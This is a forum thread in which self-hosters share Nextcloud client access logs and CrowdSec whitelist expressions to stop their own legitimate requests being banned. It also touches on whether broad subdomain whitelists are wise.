xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836425251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836225251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836125251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835645251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835935251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836705251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836885251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836615251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835845251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012842925251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/core/preview?fileId=012842825251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7583 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"

Hey what whitelists have you tried so far?

@iiAmLoz My nextcloud installation is reachable on <domain>/cloud and I tried the following:

- evt.Parsed.request contains "'/cloud/remote.php'"
- evt.Parsed.request contains "'/cloud/index.php'"
- evt.Parsed.request contains "'preview?fileId'"

I even tried - evt.Parsed.request contains "'/cloud/'" without success.

Hi,

I’m also interested in whitelist solution, as I have a similar problem with NextCloud Bookmarks app…
Seems like NextCloud devs don’t worry about generating a lot of HTTP errors :wink:

@smu44 just take a look at your servers access log and whitelist part of the last urls before the ban. i.e.:
name: my-whitelist-for-NC
description: my custom whitelists
whitelist:
reason: my whitelist for NC
expression:
- “evt.Parsed.request contains ‘/nextcloud/apps/’”
- “evt.Parsed.request contains ‘/nextcloud/remote.php/dav/’”
- “evt.Parsed.request contains ‘/nextcloud/index.php/’”
- “evt.Parsed.request contains ‘/nextcloud/avatar/’”

take a look at your double quotation marks. The first has to be at the beginning

1 Like

sorry for the late answer.
Can’t say for sure, but probably yes.
I’m using subdirectories so whitelist rule is as follows:
- “evt.Parsed.request contains ‘/ombi/api/v’”

But now I switched to subdomains and ombi is now at ombi.example.com.
Is it save to whitelist all my subdomains (ombi, jellyfin, nextcloud, and onlyoffice) or would this brake functionality?
Suggestion: - “evt.Parsed.request contains ‘ombi.example.com’”
I always feel like I should not put too many or too general urls into whitelist…

Thanks, I’ve made the correction. :+1:

That simple, really ? Dumb me! :flushed:
Thank you very much!